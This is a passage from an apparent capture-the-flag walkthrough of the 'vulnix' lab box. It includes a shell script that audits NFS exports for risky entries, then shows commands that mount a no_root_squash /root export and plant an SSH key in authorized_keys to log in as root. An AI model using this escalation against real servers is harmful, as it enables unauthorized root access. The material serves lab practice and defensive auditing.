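set -f   # no globbing: export entries contain '*'

# audit_export 'PATH CLIENT(OPTS)' -> prints one RISK line per finding,
# returns 1 if any finding, 0 for a clean entry, blank line or comment.
audit_export() {
  local line=$1 path client opts="" risky=0
  case "$line" in ''|'#'*) return 0 ;; esac
  set -- $line
  [ $# -gt 0 ] || return 0
  path=$1; client=${2:-}        # only the first client spec is examined
  case "$client" in
    *'('*')') opts=${client#*"("}; opts=${opts%")"}; client=${client%%"("*} ;;
  esac
  if [ -z "$client" ] || [ "$client" = '*' ]; then
    echo "RISK $path: mountable by any client ('${client:-<none>}')"; risky=1
  fi
  case ",$opts," in
    *,no_root_squash,*) echo "RISK $path: no_root_squash, client root is server root"; risky=1 ;;
  esac
  case "$path" in
    /root|/root/*|/home/*) echo "RISK $path: home directory exported, AUTH_SYS trusts the client UID"; risky=1 ;;
  esac
  return "$risky"
}

# audit_exports_file FILE -> audit_export over every line; returns 1 if any risk
audit_exports_file() {
  local rc=0 line
  while IFS= read -r line || [ -n "$line" ]; do
    audit_export "$line" || rc=1
  done < "$1"
  return "$rc"
}

# Constructed sample: the two entries from the box and a restricted alternative.
for entry in '/home/vulnix *' \
             '/root *(rw,no_root_squash)' \
             '/srv/share 192.168.56.128(ro,root_squash,sync)'; do
  echo "== $entry"
  audit_export "$entry" || true
done
```

Run it against a real file with audit_exports_file /etc/exports; exportfs -v shows the effective options (root_squash is implied when no_root_squash is absent), which is what the audit's defaults follow.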
The NFS server only re-reads /etc/exports when the service is restarted or exportfs -r is run, and vulnix may do neither, so the box has to be rebooted for the change to take effect. After the reboot, remount (the earlier mount can be dropped first with sudo umount /tmp/vulnix_nfs, or the new export mounted over it as below):
# The added /root directory now appears
┌──(kali㉿kali)-[~]
└─$ showmount -e 192.168.56.130
Export list for 192.168.56.130:
/root *
/home/vulnix *
┌──(kali㉿kali)-[~]
└─$ sudo mount -t nfs 192.168.56.130:/root /tmp/vulnix_nfs
Then plant the public key as before, this time as root on the attacking machine, since /root is owned by root with mode 700 and only an unsquashed root can enter the share (that is exactly what no_root_squash grants):
sudo su
cd /tmp/vulnix_nfs
mkdir .ssh
cat /tmp/vulnix_key.pub > .ssh/authorized_keys
chmod 700 .ssh
chmod 600 .ssh/authorized_keys
ls -la .ssh/
exit
ssh -i /tmp/vulnix_key root@192.168.56.130
Successfully logged in as root:
Reading the flag
The flag is in the root directory; in fact it was already readable as soon as the /root export was mounted:
root@vulnix:~# ls /root/
trophy.txt
root@vulnix:~# cat /root/trophy.txt
cc614640424f5bd60ce5d5264899c3be
Summary
The main points of this box are an SMTP misconfiguration (VRFY left enabled), NFS export misconfigurations (a world-mountable home directory, and later a no_root_squash export of /root) and the classic authorized_keys write: enumerate users through VRFY, brute force the ones that look like real accounts, then use the NFS export permissions to move up step by step.
The final escalation is not very realistic though: adding /root to the exports only takes effect once the NFS server reloads its configuration, which here meant rebooting the box. In a real engagement the target cannot be rebooted, and operations staff will rarely do it on request. The underlying lesson still holds: write access to /etc/exports, or any export that trusts client-supplied UIDs, is effectively root on the exported paths.
